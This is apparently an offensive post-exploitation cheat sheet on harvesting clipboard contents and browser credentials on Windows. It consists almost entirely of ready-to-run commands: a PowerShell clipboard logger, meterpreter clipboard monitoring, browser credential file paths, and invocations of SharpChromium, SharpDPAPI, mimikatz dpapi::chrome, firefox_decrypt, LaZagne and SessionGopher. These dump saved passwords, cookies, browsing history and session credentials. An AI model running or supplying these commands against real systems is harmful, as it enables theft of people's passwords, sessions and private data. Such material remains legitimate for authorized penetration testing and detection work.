Clipboard & Browser Credentials

Get-Clipboard

while ($true) {
    $clip = Get-Clipboard 2>$null
    if ($clip) {
        $timestamp = Get-Date -Format "HH:mm:ss"
        "$timestamp : $clip" | Out-File -Append C:\Windows\Temp\clipboard.txt
    }
    Start-Sleep -Seconds 5
}

meterpreter > load extapi
meterpreter > clipboard_get_data
meterpreter > clipboard_monitor_start
meterpreter > clipboard_monitor_dump

C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Login Data

https://github.com/djhohnstein/SharpChromium

SharpChromium.exe logins
SharpChromium.exe history
SharpChromium.exe cookies

https://github.com/djhohnstein/SharpWeb

SharpWeb.exe all

dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

SharpDPAPI.exe triage
SharpDPAPI.exe backupkey
SharpDPAPI.exe chrome

C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\

logins.json     — Encrypted credentials
key4.db         — Encryption key database
cert9.db        — Certificate store

https://github.com/unode/firefox_decrypt

python3 firefox_decrypt.py "C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xxxxx.default"

laZagne.exe browsers

C:\Users\%USERNAME%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

SharpChromium.exe logins edge

C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\History

sqlite3 History "SELECT url, title, visit_count FROM urls ORDER BY visit_count DESC LIMIT 50;"

sqlite3 places.sqlite "SELECT url, title, visit_count FROM moz_places ORDER BY visit_count DESC LIMIT 50;"

C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks

Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Bookmarks" | ConvertFrom-Json | Select -ExpandProperty roots

https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe wifi
laZagne.exe windows

https://github.com/Arvanaghi/SessionGopher

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough